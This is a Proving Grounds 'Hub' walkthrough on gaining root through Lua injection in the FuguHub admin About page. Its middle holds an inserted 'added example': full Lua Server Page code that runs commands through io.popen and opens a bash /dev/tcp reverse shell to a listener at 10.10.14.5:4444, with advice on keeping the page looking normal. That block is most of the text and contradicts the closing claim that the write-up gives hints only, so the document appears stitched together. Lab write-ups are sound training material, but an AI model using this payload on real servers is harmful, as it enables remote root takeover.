June 2, 2025

Hub Proving Grounds Write-Up

Proving Grounds Hub machine walkthrough

SUMMARY

This write-up covers the Hub machine from OffSec's Proving Grounds, a Linux box where the admin panel of a web file server (FuguHub) allowed server-side code injection, giving a shell directly as root.

Port 80 hosted FuguHub 8.4. The initial setup wizard was still available, so an admin user could be created. Research showed this version was vulnerable to remote code execution: Lua code placed into the customizable About page in the admin panel is executed by the server when the page is rendered. The payload was entered manually into the About page content, and simply opening the About page in a browser triggered it. A netcat listener then received the reverse connection as root, because the FuguHub process itself was running with root privileges, so no separate privilege escalation was needed.


PATH TO FOLLOW

  1. Reconnaissance & FuguHub Discovery on Port 80
  2. Admin Panel Setup & Access
  3. Malicious Lua Payload Injection via About Page
  4. Trigger Execution by Visiting the About Page
  5. Direct Shell as Root
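To make the mechanism behind steps 3 to 5 concrete, the following is an added example (not code from the original write-up or from the FuguHub project). It assumes the About page content is rendered by the Barracuda application server underlying FuguHub as a Lua Server Page, so anything between `<?lsp ... ?>` runs server-side; the attacker address `10.10.14.5`, port `4444` and the use of `response:write` are assumptions for illustration. The first tag only proves execution and shows which user the server runs as (the check that explains why no privilege escalation is required); the second spawns the reverse shell that the `nc -lvnp 4444` listener catches.

```lua
-- Added example, not from the original write-up. Assumes the About page is
-- processed as a Lua Server Page (<?lsp ... ?> executes server-side) by the
-- Barracuda app server that FuguHub is built on.

-- Stage 1: confirm code execution and identify the effective user.
-- io.popen runs the command as the owner of the FuguHub process; if this
-- prints "uid=0(root) ...", a shell from here will already be root.
<?lsp
local p = io.popen("id 2>&1")
local who = p:read("*a")
p:close()
response:write("<pre>", who, "</pre>")   -- response:write is an assumption
?>

-- Stage 2: reverse shell. Only add this once stage 1 has shown execution.
-- attacker_ip / attacker_port are placeholders: use your own listener
-- address and the port nc -lvnp is bound to.
<?lsp
local attacker_ip   = "10.10.14.5"   -- placeholder
local attacker_port = 4444           -- placeholder

-- bash's /dev/tcp pseudo-device avoids depending on nc being installed on
-- the target. The trailing '&' backgrounds the shell so os.execute returns
-- and the page still renders instead of hanging the HTTP request.
local cmd = string.format(
  "bash -c 'exec bash -i >& /dev/tcp/%s/%d 0>&1' &",
  attacker_ip, attacker_port)
os.execute(cmd)

response:write("About")   -- keep the page looking normal
?>
```

Stage 1 is worth the extra round trip: it tells you whether the injected code runs at all, whether `io.popen` is available in the embedded Lua environment, and whether the process owner is root, before committing to a noisy outbound connection.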

Due to OffSec's policy on content sharing, these write-ups will provide hints only rather than full solutions. I know, boring stuff.